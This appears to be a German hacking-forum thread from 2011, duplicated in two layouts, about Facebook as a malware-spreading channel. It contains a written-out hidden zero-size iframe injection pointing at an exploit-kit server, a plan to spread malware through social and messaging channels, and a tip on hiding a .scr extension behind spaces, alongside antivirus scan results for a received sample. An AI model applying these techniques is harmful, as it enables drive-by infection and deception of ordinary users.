[HaBo]

rat · 07.12.11, 08:10

Ich habe mir jetzt mal Facebook genauer angesehen und ich muss sagen das ist der Absolute Wahnsinn für Botnet Herder (Botnet Betreiber).

Eines der schlimmsten Futures dort oder wohl das schlimmste ist wen du auf einen Link klickst sehen das alle deine Kontakte und wen du jetzt 50 Kontakte hast und einer von dennen das sieht und auch auf den link Klickt sehen das wider deren Kontakte usw usw.

So was ist so schlimm daran.

Ich kann mir auf einen Server ein Exploit kit aufsetzten wie dieses. Phoenix Exploit Kit 2.0: M86 Security

Jetzt kann ich mir zugang zu einer legalen Website verschaffen,dank Exploits Database by Offensive Security finde ich dort ja Jedemenge SQLi,XSS so wie RFI Exploits.

Auf der Gekaperten Site baue ich einen Iframe ein mit Frameboarder="0" der meinen Iframe in den Hintergrund verschwinden lässt und dann sieht der Angriff wie folgt aus.

HTML-Code:

<iframe src="www.MyExploitKitServer.com" width="0" height="0" frameborder="0">
</iframe>

http://www.viruslist.com/de/images/v...08_pic02de.png

Das Exploit Kit ist in der Large durch die Lücken eine Malware nach zu laden wie den Zunker Bot Zunker Bot | PandaLabs Blog

Jetzt Klicke ich bei Facebook 1x auf www.myHackedSite.com und das geht an alle kontakte. 50 ist noch wenig einige haben 2000,wen der da drauf klickt dann aber holla die Waldfee.

Und jetzt kann man das ganze noch weiter führen in dem man die Malware mit einem Spreader Binded der sich über MSN,ICQ,Skype,Email und P2P verteilt.

Der währe Möglich

Das währe so als Währe der ganze Ozean voller ÖL und ein Funke fällt dort hinein. Die Malware verbreitet sich rasend schnell. ein User Infiziert kommt die Funktion zustande sich über MSN,ICQ,Skype,Email und P2P zu verbreiten und wen es dort gelungen ist geht es so weiter und weiter.

Das ist gemeingefährlich,es gibt ja Malware die sich über Facebook verbreitet,aber die macht das ja nur über Facebook und nicht in Kombination mit all den anderen Funktionen.

busterzZ · 08.12.11, 18:01

Für mich persönlich birgt das ganze nur Vorteile naja für die vics halt nich aber selber schuld ;D

HaBo Ads

ByteSurfer · 09.12.11, 07:26

Zitat:

naja für die vics halt nich aber selber schuld

Genau, ganz großes Tennis ...

Könnte bei so einer Sichtweise und Aussage voll "@*+#-:%&".
Vor allem der Satz selber schuld.

Warum denn das?

Wenn eine Omi auf der Strasse überfallen wird, weil Sie Ihre Handtasche in der Hand gehalten hat und diese somit entrissen wurde, kann man ja auch nicht einfach sagen: "selber schuld, hätte Sie mal ein Portemonnai in der Hosentasche gehabt!"

So, nimm das ganze bitte nicht zu sehr persönlich!
Wollte das einfach mal los werden ...

rat · 09.12.11, 19:17

Byte hat recht,eigentlich sollte Facebook es so machen das man selber bestimmen kann was an alle in der Kontaktliste geht und was nicht. Den so ist das ganze ziemlich gefährlich wen man es so macht wie in meinem Beispiel was nur zeigen sollte wie krass das Ausmaß eigentlich ist.

ByteSurfer · 10.12.11, 08:57

Ich finden Deinen Post aber sehr interessant, und bin froh das ich nicht user in diesem Social Netz bin. Für den ein oder anderen wahrscheinlich unbegreiflich. Ich sehe halt persönlich für mich keinen Nutzen, und ohne hin ist das Netzwerk ein Anlaufpunkt für schlechte absichten.

rat · 11.12.11, 08:56

Manchmal frag ich mich ob das von Mark Zuckerberg nicht beabsichtigt ist das Facebook derart unsicher ist. Immerhin spielt er da mit Daten von Millionen von Menschen rum.

enkore · 11.12.11, 10:17

Zitat:

Zitat von rat

Manchmal frag ich mich ob das von Mark Zuckerberg nicht beabsichtigt ist das Facebook derart unsicher ist. Immerhin spielt er da mit Daten von Millionen von Menschen rum.

Schau ihm in die Augen und sag mir, dass dieser Junge b ö s e ist!

rat · 11.12.11, 10:57

looooooooooooooooooool enkore ich muss mich erstmal wider einkriegen vor lachen. Ja er ist Saat des Bösen,sein Herz ist Schwarz wie die Nacht.

Von Millionen von Bildern nimmst du genau das auf dem er Pudelblick mit Kulleraugen hat.

enkore · 11.12.11, 15:27

Aber er ist doch so ein sympathischer, junger Mann!

Brauch ich noch <sarcasm>-Tags?

rat · 11.12.11, 16:42

Naja wo wir gerade bei Facebook sind,ich bin jetzt eine Woche dort angemeldet und die erste Malware Kontaktiert mich über eine Private Nachricht. Darüber muss ich mir keine Sorgen machen da ich über eine VM mit Debian und High Anonymous Proxy besuche. Der Angrieff ging voll ins Leere.

Wen ich es mir so anschaue war der Angreifer auch nicht besonders Ideen reich.

Filename: IMG05205805.JPG.scr

Cleverer währe vielleicht gewesen was ich vielleicht auch nicht sofort bemerkt hätte wen er hinter dem JPG..........................scr gemacht hätte.

(die ............ sind Leerzeichen)

Da viele im Windows die Dateiendungen nicht anzeigen lassen sieht man nur Filename.JPG...

Die 3 Punkte fallen dabei nur bei genauerem Hinsehen auf,wobei aber auch kein Exploitkit verwendet wird,sonder der Angreifer sich Blind auf den Download und das Ausführen der Datei verlässt.

Antivirus results
AhnLab-V3 - 2011.12.10.00 - 2011.12.09 - -
AntiVir - 7.11.19.57 - 2011.12.09 - -
Antiy-AVL - 2.0.3.7 - 2011.12.11 - -
Avast - 6.0.1289.0 - 2011.12.11 - -
AVG - 10.0.0.1190 - 2011.12.11 - -
BitDefender - 7.2 - 2011.12.11 - -
ByteHero - 1.0.0.1 - 2011.12.07 - -
CAT-QuickHeal - 12.00 - 2011.12.11 - -
ClamAV - 0.97.3.0 - 2011.12.11 - -
Commtouch - 5.3.2.6 - 2011.12.10 - -
Comodo - 10920 - 2011.12.11 - UnclassifiedMalware
DrWeb - 5.0.2.03300 - 2011.12.11 - -
Emsisoft - 5.1.0.11 - 2011.12.11 - Trojan-PWS.Win32.Fignotok!IK
eSafe - 7.0.17.0 - 2011.12.08 - -
eTrust-Vet - 37.0.9616 - 2011.12.09 - -
F-Prot - 4.6.5.141 - 2011.11.29 - -
F-Secure - 9.0.16440.0 - 2011.12.11 - -
Fortinet - 4.3.388.0 - 2011.12.11 - -
GData - 22 - 2011.12.11 - -
Ikarus - T3.1.1.109.0 - 2011.12.11 - Trojan-PWS.Win32.Fignotok
Jiangmin - 13.0.900 - 2011.12.11 - -
K7AntiVirus - 9.119.5640 - 2011.12.09 - -
Kaspersky - 9.0.0.837 - 2011.12.11 - HEUR:Trojan.Win32.Generic
McAfee - 5.400.0.1158 - 2011.12.11 - Artemis!06BD14302B58
McAfee-GW-Edition - 2010.1E - 2011.12.11 - Artemis!06BD14302B58
Microsoft - 1.7903 - 2011.12.11 - -
NOD32 - 6691 - 2011.12.07 - a variant of Win32/Injector.JQY
Norman - 6.07.13 - 2011.12.11 - -
nProtect - 2011-12-11.01 - 2011.12.11 - -
Panda - 10.0.3.5 - 2011.12.11 - -
PCTools - 8.0.0.5 - 2011.12.11 - -
Prevx - 3.0 - 2011.12.11 - -
Rising - 23.87.03.02 - 2011.12.08 - -
Sophos - 4.72.0 - 2011.12.11 - -
SUPERAntiSpyware - 4.40.0.1006 - 2011.12.10 - -
Symantec - 20111.2.0.82 - 2011.12.11 - -
TheHacker - 6.7.0.1.355 - 2011.12.11 - -
TrendMicro - 9.500.0.1008 - 2011.12.11 - -
TrendMicro-HouseCall - 9.500.0.1008 - 2011.12.11 - -
VBA32 - 3.12.16.4 - 2011.12.09 - -
VIPRE - 11233 - 2011.12.11 - -
ViRobot - 2011.12.10.4819 - 2011.12.11 - -
VirusBuster - 14.1.110.0 - 2011.12.11 - -
File info:
MD5: 06bd14302b58e0366201729b277e4f23
SHA1: ef746c1773cc0c44db9323b9c0394948501b18a3
SHA256: 228cd145dd9797301bbc1a3e7d11600ec4d8272208dac98bbd f5da52f5beb4f1
File size: 643072 bytes
Scan date: 2011-12-11 15:24:18 (UTC)

enkore · 11.12.11, 17:14

Vermutlich mit nem morpher behandelt und gepackt hm?

rat · 11.12.11, 17:19

//edit gepackt ja aber Morpher kann ich nicht sagen. Aber mit UPX gepackt.

enkore · 11.12.11, 17:28

Tza, peinlich für die AVs, dass die Heuristik da nicht genauer hinschaut. Es nutzen doch praktisch nur noch Kiddies und Automaten UPX... kein seriöses Programm ist im Jahre 2011 noch gepackt

rat · 11.12.11, 17:42

Wo du es gerade sagst, was isn das Comodo - 10920 - 2011.12.11 - UnclassifiedMalware

Soll das die Signatur sein oder läst Comodo die Münze entscheiden ob es sich um Malware handelt oder nicht ?

xrayn · 11.12.11, 17:55

Nein, das bedeutet, dass noch keine Signatur für die Malware in der Datenbank existiert, aber die Heuristik ein schadhaftes Programm für Wahrscheinlich hält.

Empfehlung

07.12.11, 08:10	#1 (permalink)
rat Registriert seit: 22.01.10 Likes: 19	Facebook evil Ich habe mir jetzt mal Facebook genauer angesehen und ich muss sagen das ist der Absolute Wahnsinn für Botnet Herder (Botnet Betreiber). Eines der schlimmsten Futures dort oder wohl das schlimmste ist wen du auf einen Link klickst sehen das alle deine Kontakte und wen du jetzt 50 Kontakte hast und einer von dennen das sieht und auch auf den link Klickt sehen das wider deren Kontakte usw usw. So was ist so schlimm daran. Ich kann mir auf einen Server ein Exploit kit aufsetzten wie dieses. Phoenix Exploit Kit 2.0: M86 Security Jetzt kann ich mir zugang zu einer legalen Website verschaffen,dank Exploits Database by Offensive Security finde ich dort ja Jedemenge SQLi,XSS so wie RFI Exploits. Auf der Gekaperten Site baue ich einen Iframe ein mit Frameboarder="0" der meinen Iframe in den Hintergrund verschwinden lässt und dann sieht der Angriff wie folgt aus. HTML-Code: <iframe src="www.MyExploitKitServer.com" width="0" height="0" frameborder="0"> </iframe> http://www.viruslist.com/de/images/v...08_pic02de.png Das Exploit Kit ist in der Large durch die Lücken eine Malware nach zu laden wie den Zunker Bot Zunker Bot \| PandaLabs Blog Jetzt Klicke ich bei Facebook 1x auf www.myHackedSite.com und das geht an alle kontakte. 50 ist noch wenig einige haben 2000,wen der da drauf klickt dann aber holla die Waldfee. Und jetzt kann man das ganze noch weiter führen in dem man die Malware mit einem Spreader Binded der sich über MSN,ICQ,Skype,Email und P2P verteilt. Der währe Möglich Das währe so als Währe der ganze Ozean voller ÖL und ein Funke fällt dort hinein. Die Malware verbreitet sich rasend schnell. ein User Infiziert kommt die Funktion zustande sich über MSN,ICQ,Skype,Email und P2P zu verbreiten und wen es dort gelungen ist geht es so weiter und weiter. Das ist gemeingefährlich,es gibt ja Malware die sich über Facebook verbreitet,aber die macht das ja nur über Facebook und nicht in Kombination mit all den anderen Funktionen. __________________ evil loves to party http://ratnetw0rk.blogspot.com Geändert von rat (07.12.11 um 12:48 Uhr)

09.12.11, 19:17	#4 (permalink)
rat Themenstarter Registriert seit: 22.01.10 Likes: 19	Byte hat recht,eigentlich sollte Facebook es so machen das man selber bestimmen kann was an alle in der Kontaktliste geht und was nicht. Den so ist das ganze ziemlich gefährlich wen man es so macht wie in meinem Beispiel was nur zeigen sollte wie krass das Ausmaß eigentlich ist. __________________ evil loves to party http://ratnetw0rk.blogspot.com

11.12.11, 08:56	#6 (permalink)
rat Themenstarter Registriert seit: 22.01.10 Likes: 19	Manchmal frag ich mich ob das von Mark Zuckerberg nicht beabsichtigt ist das Facebook derart unsicher ist. Immerhin spielt er da mit Daten von Millionen von Menschen rum. __________________ evil loves to party http://ratnetw0rk.blogspot.com

11.12.11, 10:57	#8 (permalink)
rat Themenstarter Registriert seit: 22.01.10 Likes: 19	looooooooooooooooooool enkore ich muss mich erstmal wider einkriegen vor lachen. Ja er ist Saat des Bösen,sein Herz ist Schwarz wie die Nacht. Von Millionen von Bildern nimmst du genau das auf dem er Pudelblick mit Kulleraugen hat. __________________ evil loves to party http://ratnetw0rk.blogspot.com

11.12.11, 15:27	#9 (permalink)
enkore Senior Member Registriert seit: 13.07.08 Likes: 61	Aber er ist doch so ein sympathischer, junger Mann! Brauch ich noch <sarcasm>-Tags? __________________ "It is the human race! The deterioration of the spirit of man. Man undermining himself, causing a self-willed, self-imposed, self-evident self-destruction." +++ BREAKING +++ Troll ertrinkt im Planschbecken +++

08.12.11, 18:01	#2 (permalink)
busterzZ Registriert seit: 06.08.11 Likes: 1	Für mich persönlich birgt das ganze nur Vorteile naja für die vics halt nich aber selber schuld ;D

10.12.11, 08:57	#5 (permalink)
ByteSurfer Registriert seit: 30.03.07 Likes: 14	Ich finden Deinen Post aber sehr interessant, und bin froh das ich nicht user in diesem Social Netz bin. Für den ein oder anderen wahrscheinlich unbegreiflich. Ich sehe halt persönlich für mich keinen Nutzen, und ohne hin ist das Netzwerk ein Anlaufpunkt für schlechte absichten.

11.12.11, 16:42	#10 (permalink)
rat Themenstarter Registriert seit: 22.01.10 Likes: 19	Naja wo wir gerade bei Facebook sind,ich bin jetzt eine Woche dort angemeldet und die erste Malware Kontaktiert mich über eine Private Nachricht. Darüber muss ich mir keine Sorgen machen da ich über eine VM mit Debian und High Anonymous Proxy besuche. Der Angrieff ging voll ins Leere. Wen ich es mir so anschaue war der Angreifer auch nicht besonders Ideen reich. Filename: IMG05205805.JPG.scr Cleverer währe vielleicht gewesen was ich vielleicht auch nicht sofort bemerkt hätte wen er hinter dem JPG..........................scr gemacht hätte. (die ............ sind Leerzeichen) Da viele im Windows die Dateiendungen nicht anzeigen lassen sieht man nur Filename.JPG... Die 3 Punkte fallen dabei nur bei genauerem Hinsehen auf,wobei aber auch kein Exploitkit verwendet wird,sonder der Angreifer sich Blind auf den Download und das Ausführen der Datei verlässt. Antivirus results AhnLab-V3 - 2011.12.10.00 - 2011.12.09 - - AntiVir - 7.11.19.57 - 2011.12.09 - - Antiy-AVL - 2.0.3.7 - 2011.12.11 - - Avast - 6.0.1289.0 - 2011.12.11 - - AVG - 10.0.0.1190 - 2011.12.11 - - BitDefender - 7.2 - 2011.12.11 - - ByteHero - 1.0.0.1 - 2011.12.07 - - CAT-QuickHeal - 12.00 - 2011.12.11 - - ClamAV - 0.97.3.0 - 2011.12.11 - - Commtouch - 5.3.2.6 - 2011.12.10 - - Comodo - 10920 - 2011.12.11 - UnclassifiedMalware DrWeb - 5.0.2.03300 - 2011.12.11 - - Emsisoft - 5.1.0.11 - 2011.12.11 - Trojan-PWS.Win32.Fignotok!IK eSafe - 7.0.17.0 - 2011.12.08 - - eTrust-Vet - 37.0.9616 - 2011.12.09 - - F-Prot - 4.6.5.141 - 2011.11.29 - - F-Secure - 9.0.16440.0 - 2011.12.11 - - Fortinet - 4.3.388.0 - 2011.12.11 - - GData - 22 - 2011.12.11 - - Ikarus - T3.1.1.109.0 - 2011.12.11 - Trojan-PWS.Win32.Fignotok Jiangmin - 13.0.900 - 2011.12.11 - - K7AntiVirus - 9.119.5640 - 2011.12.09 - - Kaspersky - 9.0.0.837 - 2011.12.11 - HEUR:Trojan.Win32.Generic McAfee - 5.400.0.1158 - 2011.12.11 - Artemis!06BD14302B58 McAfee-GW-Edition - 2010.1E - 2011.12.11 - Artemis!06BD14302B58 Microsoft - 1.7903 - 2011.12.11 - - NOD32 - 6691 - 2011.12.07 - a variant of Win32/Injector.JQY Norman - 6.07.13 - 2011.12.11 - - nProtect - 2011-12-11.01 - 2011.12.11 - - Panda - 10.0.3.5 - 2011.12.11 - - PCTools - 8.0.0.5 - 2011.12.11 - - Prevx - 3.0 - 2011.12.11 - - Rising - 23.87.03.02 - 2011.12.08 - - Sophos - 4.72.0 - 2011.12.11 - - SUPERAntiSpyware - 4.40.0.1006 - 2011.12.10 - - Symantec - 20111.2.0.82 - 2011.12.11 - - TheHacker - 6.7.0.1.355 - 2011.12.11 - - TrendMicro - 9.500.0.1008 - 2011.12.11 - - TrendMicro-HouseCall - 9.500.0.1008 - 2011.12.11 - - VBA32 - 3.12.16.4 - 2011.12.09 - - VIPRE - 11233 - 2011.12.11 - - ViRobot - 2011.12.10.4819 - 2011.12.11 - - VirusBuster - 14.1.110.0 - 2011.12.11 - - File info: MD5: 06bd14302b58e0366201729b277e4f23 SHA1: ef746c1773cc0c44db9323b9c0394948501b18a3 SHA256: 228cd145dd9797301bbc1a3e7d11600ec4d8272208dac98bbd f5da52f5beb4f1 File size: 643072 bytes Scan date: 2011-12-11 15:24:18 (UTC) __________________ evil loves to party http://ratnetw0rk.blogspot.com Geändert von rat (11.12.11 um 17:37 Uhr)

11.12.11, 17:14	#11 (permalink)
enkore Senior Member Registriert seit: 13.07.08 Likes: 61	Vermutlich mit nem morpher behandelt und gepackt hm? __________________ "It is the human race! The deterioration of the spirit of man. Man undermining himself, causing a self-willed, self-imposed, self-evident self-destruction." +++ BREAKING +++ Troll ertrinkt im Planschbecken +++

11.12.11, 17:19	#12 (permalink)
rat Themenstarter Registriert seit: 22.01.10 Likes: 19	//edit gepackt ja aber Morpher kann ich nicht sagen. Aber mit UPX gepackt. __________________ evil loves to party http://ratnetw0rk.blogspot.com Geändert von rat (11.12.11 um 17:24 Uhr)

11.12.11, 17:28	#13 (permalink)
enkore Senior Member Registriert seit: 13.07.08 Likes: 61	Tza, peinlich für die AVs, dass die Heuristik da nicht genauer hinschaut. Es nutzen doch praktisch nur noch Kiddies und Automaten UPX... kein seriöses Programm ist im Jahre 2011 noch gepackt __________________ "It is the human race! The deterioration of the spirit of man. Man undermining himself, causing a self-willed, self-imposed, self-evident self-destruction." +++ BREAKING +++ Troll ertrinkt im Planschbecken +++

11.12.11, 17:42	#14 (permalink)
rat Themenstarter Registriert seit: 22.01.10 Likes: 19	Wo du es gerade sagst, was isn das Comodo - 10920 - 2011.12.11 - UnclassifiedMalware Soll das die Signatur sein oder läst Comodo die Münze entscheiden ob es sich um Malware handelt oder nicht ? __________________ evil loves to party http://ratnetw0rk.blogspot.com

11.12.11, 17:55	#15 (permalink)
xrayn Member of Honour Registriert seit: 05.03.08 Likes: 190	Nein, das bedeutet, dass noch keine Signatur für die Malware in der Datenbank existiert, aber die Heuristik ein schadhaftes Programm für Wahrscheinlich hält.

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
Resident Evil 3 USB	devildire	Games	11	17.05.10 19:03
Resident Evil 5 PS3 Coop	D31~$0u1	Games	1	22.03.09 19:40
sony still evil?	Gulliver	News & Ankündigungen	4	02.09.07 20:48
Evil irc...	jorey	Fun Section	1	30.04.06 15:45


HaBo Ads HaBOT

[HaBo]

Facebook evil